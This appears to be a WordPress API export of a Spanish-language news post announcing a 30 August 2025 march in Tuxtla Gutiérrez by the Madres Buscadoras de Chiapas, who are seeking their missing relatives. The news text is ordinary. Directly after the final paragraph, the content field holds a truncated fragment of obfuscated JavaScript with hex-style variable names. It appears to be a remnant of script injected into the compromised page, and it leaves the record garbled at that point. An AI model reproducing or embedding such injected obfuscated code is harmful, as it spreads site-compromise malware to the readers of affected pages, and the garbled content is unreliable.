{"id":23634,"date":"2025-08-23T03:07:28","date_gmt":"2025-08-23T03:07:28","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23634"},"modified":"2025-08-23T03:07:28","modified_gmt":"2025-08-23T03:07:28","slug":"marcharan-madres-buscadoras-en-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23634","title":{"rendered":"Marchar\u00e1n madres buscadoras en Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"426\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000293309.jpg\" alt=\"\" class=\"wp-image-23635\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000293309.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000293309-300x178.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>22 de agosto del 2025. Tuxtla Guti\u00e9rrez.- El d\u00eda 30 de agosto, el colectivo de Madres Buscadoras de Chiapas ha convocado a una marcha para exigir respuestas y acciones concretas en la localizaci\u00f3n de sus seres queridos.<\/p>\n\n\n\n<p>La movilizaci\u00f3n partir\u00e1 a las 9:00 horas desde el acceso poniente de la ciudad, conocido como &#8220;La Pochota&#8221;, y tendr\u00e1 como destino final el Palacio de Gobierno, en el primer cuadro de la capital.<\/p>\n\n\n\n<p>La protesta surge como una respuesta directa a lo que las familias perciben como abandono por parte de las autoridades.<\/p>\n\n\n\n<p>La marcha del 30 de agosto busca mantener la presi\u00f3n social y visibilizar una crisis humanitaria que, denuncian, el gobierno estatal se niega a reconocer en toda su magnitud.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 22 de agosto del 2025. Tuxtla Guti\u00e9rrez.- El d\u00eda 30 de agosto, el colectivo de Madres Buscadoras de Chiapas ha convocado a una marcha para exigir respuestas y acciones concretas en la localizaci\u00f3n de sus seres queridos. La movilizaci\u00f3n partir\u00e1 a las 9:00 horas desde el acceso poniente de la ciudad, conocido como &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23635,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-23634","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23634","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23634"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23634\/revisions"}],"predecessor-version":[{"id":23636,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23634\/revisions\/23636"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23635"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23634"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23634"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23634"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}